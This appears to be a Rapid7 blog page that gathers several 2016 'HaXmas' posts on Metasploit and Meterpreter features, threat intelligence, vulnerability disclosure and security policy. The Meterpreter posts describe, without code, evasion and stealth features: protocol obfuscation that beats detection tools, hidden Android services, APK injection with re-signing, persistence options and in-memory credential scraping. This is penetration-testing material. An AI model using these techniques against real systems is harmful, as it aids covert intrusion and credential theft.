Rapid7 Blog

Haxmas  

12 Days of HaXmas: Meterpreter's new Shiny for 2016

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts! Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year. On the first day of Haxmas, OJ gave us an Obfuscated Protocol Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager On the second day of Haxmas, Tim gave us two Android Services Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose a your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way. On the third day of Haxmas, OJ gave us three Reverse Port Forwards While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now setup a locally-visible service via a Meterpreter session that visible to your target users. This is a nice complement to standard port forwarding that has been available with Meterpreter sessions for some time. On the fourth day of Haxmas, Tim gave us four Festive Wallpapers Sometimes, when on an engagement, you just want to know 'who did I own?'.  Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your your choosing. On the fifth day of Haxmas, OJ gave us five Powershell Prompts Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system. This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to confortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capaibilites built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017. On the sixth day of Haxmas, Tim gave us six SQLite Queries Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But, getting data from applications can be trickier. Many Android applications use SQLite for data storage however, and armed with the combination of a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session. On the seventh day of Haxmas, danilbaz gave us seven Process Images This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well. On the eight day of Haxmas, Tim gave us eight Androids in Packages The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support. On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash. On the tenth day of Haxmas, OJ gave us ten Universal Handlers Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it. On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (/2015/01/05/maxing-meterpr eters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well it works as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload. On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealty operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present. Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!

12 Days of HaXmas: The Gift of Endpoint Visibility and Log Analytics

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Machine generated log data is probably the simplest and one of the most used data source for everyday use cases such as troubleshooting, monitoring, security investigations … the list goes on. Since log data records exactly what happens in your software over time it is extremely useful for understanding what had caused an outage or security vulnerability. With technologies like InsightOps, it can also be used to monitor systems in real time by looking at live log data which can contain anything from resource usage information, to error rates, to user activity etc. So in short when used for the right job, log data is extremely powerful... until it's NOT! When is it not useful to look at logs? When your logs don't contain the data you need. How many times during an investigation have your logs contained enough information to point you in the right direction, but then fell short of giving you the complete picture. Unfortunately, it is quite common to run out of road when looking at log data; if only you had recorded 'user logins', or some other piece of data that was important with hindsight, you could figure out what user installed some malware and your investigation would be complete. Log data, by its very nature, provides an incomplete view of your system, and while log and machine data is invaluable for troubleshooting, investigations and monitoring, it is generally at its most powerful when used in conjunction with other data sources. If you think about it, knowing exactly what to log up front to give you 100% code or system coverage is like trying to predict the future. Thus when problems arise or investigations are underway, you may not have the complete picture you need to identify the true root cause. So our gift to you this HaXmas is the ability to generate log data on the fly through our new endpoint technology, InsightOPs, which enables you to  fill in any missing information during troubleshooting or investigations. InsightOps is pioneering the ability to generate log data on the fly by allowing end users to ask questions of their environment, InsightOps is pioneering the ability to generate log data on the fly by returning answers in the form of logs. Essentially, it will allow you to create synthetic logs which can be combined with your traditional log data - giving you the complete picture! It also gives you all this information in one place (so no need to combine a bunch of different IT monitoring tools to get all the information you need). You will be able to ask anything from 'what processes are running on every endpoint in my environment' to ‘what is the memory consumption' of a given process or machine. In fact, our vision is to allow users to ask any question that might be relevant for their environment such that you will never be left in the dark and never again have to say ‘if only I had logged that.' Interested in trying InsightOps for yourself? Sign up here: https://www.rapid7.com/products/insightops/ Happy HaXmas!

12 Days of HaXmas: New Years Resolutions for the Threat Intelligence Analyst

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. You may or may not know this about me, but I am kind of an overly optimistic sunshine and rainbows person, especially when it comes to threat intelligence. I love analysis, I love tackling difficult problems, connecting dots, and finding ways to stop malicious actors from successfully attacking our networks. Even though 2016 tried to do a number on us (bears, raccoons, whatever...) I believe that we can come through relatively unscathed, and in 2017 we can make threat intelligence even better by alleviating a lot of confusion and addressing many of the misunderstandings that make it more difficult to integrate threat intelligence into information security operations. In the spirit of the new year, we have compiled of a list of Threat Intelligence Resolutions for 2017. Don't chase shiny threat intel objects Intelligence work, especially in the cyber realm, is complex, involved, and often time-consuming. The output isn't always earth-shattering; new rules to detect threats, additional indicators to search for during an investigation, a brief to a CISO on emerging threats, situational awareness for the SOC so they better understand the alerts they respond to. Believe it or not in this media frenzied world, that is the way it is supposed to be. Things don't have to be sensationalized to be relevant. In fact, many of the things that you will discover through analysis won't be sensational but they are still important. Don't discount these things or ignore them in order to go chase shiny threat intelligence objects – things that look and sound amazing and important but likely have little relevance to you. Be aware that those shiny things exist, but do not let them take away from the things that are relevant to you. It is also important to note that not everything out there that gets a lot of attention is bad – sometimes something is big because it is a big deal and something you need to focus on. Knowing what is just a shiny object and what is significant comes down to knowing what is important to you and your organization, which brings us to resolution #2. Identify your threat intelligence requirements Requirements are the foundation of any intelligence work. Without them you could spend all of your time finding interesting things about threats without actually contributing to the success of your information security program. There are many types and names for intelligence requirements: national intelligence requirements, standing intelligence requirements, priority intelligence requirements – but they are all a result of a process that identifies what information is important and worth focusing on. As an analyst, you should not be focusing on something that does not directly tie back to an intelligence requirement. If you do not currently have intelligence requirements and are instead going off of some vague guidance like “tell me about bad things on the internet” it is much more likely that you will struggle with resolution #1 and end up chasing the newest and shiniest threat rather than what is important to you and your organization. There are many different ways to approach threat intelligence requirements – they can be based off of business requirements, previous incidents, current events, or a combination of the above. Scott Roberts and Rick Holland have both written posts to help organizations develop intelligence requirements, and they are excellent places to start with this resolution. (They can be found here and here.) Be picky about your sources One of the things we collectively struggled with in 2016 was helping people understand the difference between threat intelligence and threat feeds. Threat intelligence is the result of following the intelligence cycle - from developing requirements, through collection and processing, analysis, and dissemination. For a (much) more in depth look into the intelligence cycle read JP 2-0, the publication on Joint Intelligence [PDF]. Threat feeds sit solidly in the collection/processing phase of the intelligence cycle - they are not finished intelligence, but you can't have finished intelligence without collection, and threat feeds can provide the pieces needed to conduct analysis and produce threat intelligence. There are other sources of collection besides feeds, including alerts issued by government agencies or commercial intelligence providers that often contain lists of IOCs. With all of these things it is important to ask questions about the indicators themselves: Where does the information come from? A honeypot? Is it low interaction or high interaction? Does it include scanning data? Are there specific attack types that they are monitoring for? Is it from an incident response investigation? When did that investigation occur? Are the indicators pulled directly from other threat feeds/sources? If so, which ones? What is included in the feed? Is it simply IOCs or is there additional information or context available? Remember, this type of information must still be analyzed and it can be very difficult to do that without additional context. When was the information collected? Some types of information are good for long periods, but some are extremely perishable and it is important to know when the information was collected, not just when you received it. It is also important to know if you should be using indicators to look back through historical logs or generate alerts for future activity. Tactical indicators have dominated the threat intelligence space and many organizations employ them without a solid understanding of what threats are being conveyed in the feeds or where the information comes from, simply because they are assure that they have the "best threat feed" or the "most comprehensive collection" or maybe they come from a government agency with a fancy logo (although let's be honest, not that fancy) but you should never blindly trust those indicators, or you will end up with a pile of false positives. Or a really bad cup of coffee. It isn't always easy to find out what is in threat feeds, but it isn't impossible. If threat feeds are part of your intelligence program then make it your New Year's resolution to understand where the data in the feeds comes from, how often it is updated, where you need to go to find out additional information about any of the indicators in the feeds, and whether or not it will support your intelligence requirements. If you can't find that information out then it may be a good idea to also start looking for feeds that you know more about. Look OUTSIDE of the echo chamber It is amazing how many people you can find to agree with your assessment (or agree with your disagreement of someone else's assessment) if you continue to look to the same individuals or the same circles. It is almost as if there are biases as work - wait, we know a thing or two about biases! This Graphic Explains 20 Cognitive Biases That Affect Your Decision-Making>Confirmation bias, bandwagoning, take your pick. When we only expose ourselves to certain things within the cyber threat intelligence realm we severely limit our understanding of the problems that we are facing and the many different factors that influence them. We also tend to overlook a lot of intelligence literature that can help us understand how we should be addresses those problems. Cyber intelligence is not so new and unique that we cannot learn from traditional intelligence practices. Here are some good resources on intelligence analysis and research: Kent Center Occasional Papers — Central Intelligence Agency The Kent Center, a component of the employee-only Sherman Kent School for Intelligence Analysis at CIA University, strives to promote the theory, doctrine, and practice of intelligence analysis. Congressional Research Service The Congressional Research Service, a component of the Library of Congress, conducts research and analysis for Congress on a broad range of national policy issues. The Council on Foreign Relations The Council on Foreign Relations (CFR) is an independent, nonpartisan membership organization, think tank, and publisher. Don't be a cotton headed ninny muggins Now this is where the hopeful optimist in me really comes out. One of the things that has bothered me most in 2016 is the needless fighting and arguments over, well, just about everything. Don't get me wrong, we need healthy debate and disagreement in our industry. We need people to challenge our assumptions and help us identify our biases. We need people to fill in any additional details that they may have regarding the analysis in question. What we don't need is people being jerks or discounting analysis without having seen a single piece of information that the analysis was based off of. There are a lot of smart people out there, and if someone publishes something you disagree with or your question then there are plenty of ways to get in touch with them or voice your opinion in a way that will make our collective understanding of intelligence analysis better.

12 Days of Haxmas: Giving the Gift of Bad News

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. This holiday season, eager little hacker girls and boys around the world will be tearing open their new IoT gadgets and geegaws, and set to work on evading tamper evident seals, proxying communications, and reversing firmware, in search of a Haxmas miracle of 0day. But instead of exploiting these newly discovered vulnerabilities, many will instead notice their hearts growing three sizes larger, and wish to disclose these new vulns in a reasonable and coordinated way in order to bring attention to the problem and ultimately see a fix for the discovered issues. In the spirit of HaXmas, then, I'd like to take a moment to talk directly to the good-hearted hackers out there about how one might go about disclosing vulnerabilities in a way that maximizes the chances that your finding will get the right kind of attention. Keep It Secret, Keep it Santa First and foremost, I'd urge any researcher to consider the upsides of keeping your disclosure confidential for the short term. While it might be tempting to tweet a 140-character summary publically to the vendor's alias, dropping this kind of bomb on the social media staff of an electronics company is kind of a jerk move, and only encourages an adversarial relationship from there on out. In the best case, the company most able to fix the issue isn't likely to work with you once you've published, and in the worst, you might trigger a defensive reflex where the vendor refuses to acknowledge the bug at all. Instead, consider writing a probing email to the company's email aliases of security@, secure@, abuse@, support@, and info@, along the lines of, "Hi, I seem to have found a software vulnerability with your product, who can I talk to?" This is likely to get a human response, and you can figure out from there who to talk to about your fresh new vulnerability. The Spirit of Giving You could also go a step further, and check the vendor's website to see if they offer a bug bounty for discovered issues, or even peek in on HackerOne's community-curated directory of security contacts and bug bounties. For example, searching for Rapid7 gives a pointer to our disclosure policies, contact information, and PGP key. However, be careful when deciding to participate in a bug bounty. While the vast majority of bounty programs out there are well-intentioned, some come with an agreement that you will never, ever, ever, in a million years, ever disclose the bug to anyone else, ever — even if the vendor doesn't deign to acknowledge or fix the issue. This can leave you in a sticky situation, even if you end up getting paid out. If you agree to terms like that, you can limit your options for public disclosure down the line if the fix is non-existent or incomplete. Because of these kinds of constraints, I tend to avoid bug bounties, and merely offer up the information for free. It's totally okay to ask about a bounty program, of course, but be sure that you're not phrasing your request that can be read as an extortion attempt — that can be taken as an attack, and again, trigger a negative reaction from the vendor. No Reindeer Games In the happy case where you establish communications with the vendor, it's best to be as clear and as direct as possible. If you plan to publish your findings on your blog, say so, and offer exactly what and when you plan to publish. Giving vendors deadlines — in a friendly, non-threatening, matter-of-fact way — turns out to be a great motivator for getting your issue prioritized internally there. Be prepared to negotiate around the specifics, of course — you might not know exactly how to fix a bug, and how long that'll take, and the moment you disclose, they probably don't, either. Most importantly, though, try to avoid over-playing your discovery. Consider what an adversary actually has to do to exploit the bug — maybe they need to be physically close by, or already have an authorized account, or something like that. Being upfront with those details can help frame the risk to other users, and can tamp down irrational fears about the bug. Finally, try to avoid blaming the vendor too harshly. Bugs happen — it's inherent in the way we write, assemble, and ship software for general purpose computers. Assume the vendor isn't staffed with incompetents and imbeciles, and that they actually do care about protecting their customers. Treating your vendor with respect will engender a pretty typical honey versus vinegar effect, and you're much more likely to see a fix quickly. Sing it Loud For All to Hear Assuming you've hit your clearly-stated disclosure deadline, it's time to publish your findings. Again, you're not trying to shame the vendor with your disclosure — you're helping other people make better informed decisions about the security of their own devices, giving other researchers a specific, documented case study of a vulnerability discovered in a shipping product, and teaching the general public about How Security Works. Again, effectively communicating the vulnerability is critical. Avoid generalities, and offer specifics — screenshots, step-by-step instructions on how you found it, and ideally, a Metasploit module to demonstrate the effects of an exploit. Doing this helps move other researchers along in helping them to completely understand your unique findings and perhaps apply your learnings to their own efforts. Ideally, there's a fix already available and distributed, and if so, you should clearly state that, early on in your disclosure. If there isn't, though, offer up some kind of solution to the problem you've discovered. Nearly always, there is a way to work around the issue through some non-default configuration, or a network-level defense, or something like that. Sometimes, the best advice is to avoid using the product all together, but that tends to be the last course of defense. Happy HaXmas! Given the recently enacted DMCA research exemption on consumer devices, I do expect to see an uptick in disclosing issues that center around consumer electronics. This is ultimately a good thing -- when people tinker with their own devices, they are more empowered to make better decisions on how a technology can actually affect their lives. The disclosure process, though, can be almost as challenging as the initial hackery as finding and exploiting vulnerabilities in the first place. You're dealing with emotional people who are often unfamiliar with the norms of security research, and you may well be the first security expert they've talked to. Make the most of your newfound status as a security ambassador, and try to be helpful when delivering your bad news.

12 Days of HaXmas: Giving Rapid7 Customers a Way to Share Their Voice

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. In early 2014, we formally launched a program called Rapid7 Voice. It's an advocacy program that enables our outstanding customers to build their personal brand while guiding Rapid7 innovation. The Voice program gives you the opportunity to become involved with Rapid7 at whatever commitment level is right for you. This program is a unique opportunity for Rapid7 customers to help influence product development and become more involved with the tools they are using. Participants also get the chance to network with peers, speak at industry events, and engage with other customers in mentorship roles. To supplement the Voice program, we have VoiceUp, an online customer advocacy engagement hub which gives customers the opportunity to be the first to learn about Rapid7's product roadmap and the power to influence innovation in development. Members also get first access to news, content, and engagement opportunities. In the hub, customers can earn points for all their completed engagement “activities,” big or small, to redeem great rewards. With both Voice and VoiceUp, the focus is not only to actively involve customers in the development of our products and services through their feedback and insights, but also to help them build a personal brand. Advocates are invited to participate in a variety of engagement opportunities to gain more experience and exposure within the industry. Here are some examples: Webcast: Overcoming the innovation paradox in 2017 Brian Gray, Bo Weaver, Russ Verbofsky and Westley Roberts Podcast: Security Nation Podcast with Bo Weaver Speaking: Scott Meyer on UNITED 2016 IoT Panel Session Influence: Feature Update Influenced by Rapid7 Advocates Feedback: UX Team Focusing on Advocate Feedback There are countless ways to engage with us here at Rapid7, and we want every customer to have a great experience. Take it from these advocates: “[VoiceUp allows me] to interact with Rapid7 in a way that not many other companies have [including] reading what others have written, additional awareness of security news articles on Rapid7, and learning about current events. Rapid7 seems to have a vested interest in using the information provided to benefit the users of VoiceUp. “ - Brian Haessly, IT Security Engineer >“You can't complain about a product that allows you to have an input into it. It is nice to have a company as large as Rapid7 wanting to hear what the end user wants to say and not just building it the way the company wants with the "that's the way it is" attitude.” - Eric Pirolli, IT Security Analyst at The University of Toledo >“I've joined Rapid7 VoiceUp hub so I may have an opportunity to be involved in something bigger than myself. I feel I am part of an evolving industry that is meant to help and protect. I have had an opportunity to speak with the product team, been part of a webcast, and engaged with other security professionals. But my biggest reason to stay an active member of VoiceUp is to help others.” - Jack Voth, Sr. Director of Information Technology at Algenol Biotech If you want to join these Rapid7 Advocates and get involved, visit https://www.rapid7.com/about/rapid7-voice/ to read more about the program and sign up today.

12 Days of HaXmas: Metasploit Framework 2016 Overview

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Breaking Records and Breaking Business 2016 brought plenty of turmoil, and InfoSec was no exception: Largest data breach: Largest breach ever, affecting more than 1 billion Yahoo users. And they were not alone: Oracle, LinkedIn, the Department of Justice, SnapChat, Verizon, DropBox, the IRS — many organizations experienced, or discovered (or finally revealed the true extent of...), massive breaches this year. Record-breaking denial of service attacks: law enforcement efforts targeting DDoS-as-a-Service providers are encouraging, but Mirai achieved record-breaking DDoS attacks this year. It turns out those easy-to-take-for-granted devices joining the Internet of Things in droves can pack quite a punch. Ransomware: the end of 2015 saw a meteoritic rise in the prevalence of ransomware, and this continued in 2016. Healthcare and other targeted industries have faced 2-4x as many related attacks this year, some via increased coverage of ransomware in exploits kits, but mostly through plain old phishing. Businesses and individuals continue to face new and increasing threats in keeping their essential systems and data secure. A static defense will not suffice: they must increase in both awareness and capability regularly in order to form a robust security program. Metasploit Framework has grown in many ways during 2016, both through the broader community and through Rapid7 support. Let's look back through some of the highlights: More exploits A surprisingly wide range of exploits were added to Metasploit Framework in 2016: Network management: NetGear, OpenNMS, webNMS, Dell, and more Monitoring and backup: Nagios XI, Exagrid Security: ClamAV, TrendMicro, Panda, Hak5 Pineapple, Dell SonicWall, Symantec -- and Metasploit itself! Mainframes, SCADA dashboards Exploit Kits: Dark Comet, Phoenix ExtraBACON; StageFright Content management/web applications: Joomla, TikiWiki, Ruby on Rails, Drupal, Wordpress forms Docker, Linux kernel, SugarCRM, Oracle test suite, Apache Struts, exim, Postgres, and many more! More flexibility Metasploit Framework provides many supporting tools, aside from those designed to get a session on a target. These help in collecting information from a wide variety of systems, staying resilient to unknown and changing network environments, and looking like you belong. Some expansions to the toolbox in 2016 included: Additional persistence options: cron jobs, SSH keys, and boot services Improvements to payload handlers, including a universal handler Android: inject Meterpreter into an existing APK and re-sign Mettle: a new native POSIX Meterpreter PowerShell: run scripts even if PowerShell isn't installed on the target, upload to PowerShell Empire, and more Data collection: Amazon EC2 metadata, OS X Messages, subdomain enumeration, trusted Office locations — even generate an org chart from Active Directory. By the Numbers Nearly 400 people have contributed code to Metasploit Framework during its history. And speaking of history: Metasploit Framework turned 13 this year! Long long ago, in a console (probably not too) far away: Metasploit Framework 2.2 - 30 exploits Has much changed in the last 12 years? Indeed! Metasploit Framework 4.13.8 - 1607 exploits In 2016, Metasploit contributors added over 150 new modules. Metasploit Framework's growth is powered by Rapid7, and especially by the community of users that give back by helping the project in a variety of ways, from landing pull requests to finding flags. Topping the list of code contributors in 2016: Wei Chen (sinn3r), Brent Cook, William Vu (wvu), Dave Maloney (thelightcosine), h00die, OJ Reeves, nixawk, James Lee (egypt), Jon Hart, Tim Wright, Brendan Watters, Adam Cammack, Pedro Ribeiro, Josh Hale (sn0wfa11), and Nate Caroe (TheNaterz). The Metasploit Framework GitHub project is approaching 4700 forks, and ranks in the top 10 for Ruby projects once again. It's also the second most starred security project on GitHub. None of this would have been possible if not for the dedication and drive of the Metasploit community. Together, we can continue to highlight flaws in existing systems, and better test the essential software of tomorrow. John Locke voiced in 1693 what open source security supporters continue to know well today: "The only fence against the world is a thorough knowledge of it." So what about you? New to Metasploit? Check out the wiki for usage info and lots more! Need a refresher? Check out the new module documentation approach, including usage examples Get the latest Metasploit Framework and try it out against Metasploitable3! Hop on the #metasploit channel on IRC to ask questions, or hit us up on Twitter Want to Contribute? Thank you! There are many forms that can take, and whether adding module documentation, fixing a bug, filing a bug, sharing an idea, or putting up a pull request for your first exploit module: these are all valuable!

12 Days of HaXmas: Year-End Policy Comment Roundup

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. On the seventh day of Haxmas, the Cyber gave to me: a list of seven Rapid7 comments to government policy proposals! Oh, tis a magical season. It was an active 2016 for Rapid7's policy team. When government agencies and commissions proposed rules or guidelines affecting security, we often submitted formal "comments" advocating for sound cybersecurity policies and greater protection of security researchers. These comments are typically a cross-team effort, reflecting the input of our policy, technical, industry experts, and submitted with the goal of helping government better protect users and researchers and advance a strong cybersecurity ecosystem. Below is an overview of the comments we submitted over the past year. This list does not encompass the entirety of our engagement with government bodies, only the formal written comments we issued in 2016. Without further ado: 1. Comments to the National Institute for Standards and Technology (NIST), Feb. 23: NIST asked for public feedback on its Cybersecurity Framework for Improving Critical Infrastructure Cybersecurity. The Framework is a great starting point for developing risk-based cybersecurity programs, and Rapid7's comments expressed support for the Framework. Our comments also urged updates to better account for user-based attacks and ransomware, to include vulnerability disclosure and handling policies, and to expand the Framework beyond critical infrastructure. We also urged NIST to encourage greater use of multi-factor authrntication and more productive information sharing. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-nist-fr amework-022316.pdf 2. Comments to the Copyright Office, Mar. 3: The Copyright Office asked for input on its (forthcoming) study of Section 1201 of the DMCA. Teaming up with Bugcrowd and HackerOne, Rapid7 submitted comments that detailed how Section 1201 creates liability for good faith security researchers without protecting copyright, and suggested specific reforms to improve the Copyright Office's process of creating exemptions to Section 1201. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-bugcrowd--hackerone -joint-comments-to-us-copyright-office-s… 3. Comments to the Food and Drug Administration (FDA), Apr. 25: The FDA requested comments for its postmarket guidance for cybersecurity of medical devices. Rapid7 submitted comments praising the FDA's holistic view of the cybersecurity lifecycle, use of the NIST Framework, and recommendation that companies adopt vulnerability disclosure policies. Rapid7's comments urged FDA guidance to include more objective risk assessment and more robust security update guidelines. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-fda-dra ft-guidance-for-postmarket-management-of… 4. Comments to the Dept. of Commerce's National Telecommunications and Information Administration (NTIA), Jun. 1: NTIA asked for public comments for its (forthcoming) "green paper" examining a wide range of policy issues related to the Internet of Things. Rapid7's comprehensive comments detailed – among other things – specific technical and policy challenges for IoT security, including insufficient update practices, unclear device ownership, opaque supply chains, the need for security researchers, and the role of strong encryption. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-ntia-in ternet-of-things-rfc-060116.pdf 5. Comments to the President's Commission on Enhancing National Security (CENC), Sep. 9: The CENC solicited comments as it drafted its comprehensive report on steps the government can take to improve cybersecurity in the next few years. Rapid7's comments urged the government to focus on known vulnerabilities in critical infrastructure, protect strong encryption from mandates to weaken it, leverage independent security researchers as a workforce, encourage adoption of vulnerability disclosure and handling policies, promote multi-factor authentication, and support formal rules for government disclosure of vulnerabilities. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-cenc-rf i-090916.pdf 6. Comments to the Copyright Office, Oct. 28: The Copyright Office asked for additional comments on its (forthcoming) study of Section 1201 reforms. This round of comments focused on recommending specific statutory changes to the DMCA to better protect researchers from liability for good faith security research that does not infringe on copyright. Rapid7 submitted these comments jointly with Bugcrowd, HackerOne, and Luta Security. The comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-bugcrowd-hackerone- luta-security-joint-comments-to-copyrigh… 7. Comments to the National Highway Traffic Safety Administration (NHTSA), Nov. 30: NHTSA asked for comments on its voluntary best practices for vehicle cybersecurity. Rapid7's comments recommended that the best practices prioritize security updating, encourage automakers to be transparent about cybersecurity features, and tie vulnerability disclosure and reporting policies to standards that facilitate positive interaction between researchers and vendors. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-nhtsa-c ybersecurity-best-practices-for-modern-v… 2017 is shaping up to be an exciting year for cybersecurity policy. The past year made cybersecurity issues even more mainstream, and comments on proposed rules laid a lot of intellectual groundwork for helpful changes that can bolster security and safety. We are looking forward to keeping up the drumbeat for the security community next year. Happy Holidays, and best wishes for a good 2017 to you!

12 Days of HaXmas: A HaxMas Carol

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the…

